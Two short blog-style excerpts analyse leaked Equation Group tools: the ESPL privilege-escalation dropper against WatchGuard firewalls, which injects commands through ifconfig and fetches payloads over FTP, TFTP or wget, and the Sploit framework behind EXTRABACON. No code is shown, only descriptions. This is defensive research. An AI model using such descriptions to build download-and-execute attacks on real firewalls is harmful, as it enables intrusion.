Escalate Plowman – Linux FW Privilege Escalated Download and Execute

The Escalte Plowman tool (https://github.com/dreilly369/EQGRP-Auction-Files/tree/master/Firewall/EXPLOITS/ESPL) is a parameterized dropper (or a privelege escalation exploit) against WatchGuard firewalls (and likely a few others) of unknown versions. It injects code via the ifconfig command. It uses FTP, TFTP, or HTTP (via wget) for the download portions. The code makes some assumptions about the environment. For instance, when using the TFTP protocol it assumes the existence of a custom tftp client located at the hard-coded location /usr/rapidstream/bin/tftp. The sample also makes the assumption of the interface being eth0.

Extrabacon's Sploit Framework 1: Static Analysis

Sploit is the modular core that runs the EXTRABACON exploit in the (supposed) Equation group tool dump. While everyone is focused on the news of the 0-days, the recent porting of this old exploit to newer ASA versions (http://www.securityweek.com/leaked-cisco-asa-exploit-adapted-newer-versions) I chose to look at the underlying structure. First because there are already a number of talented researchers covering every angle of each exploit in greater detail than I could.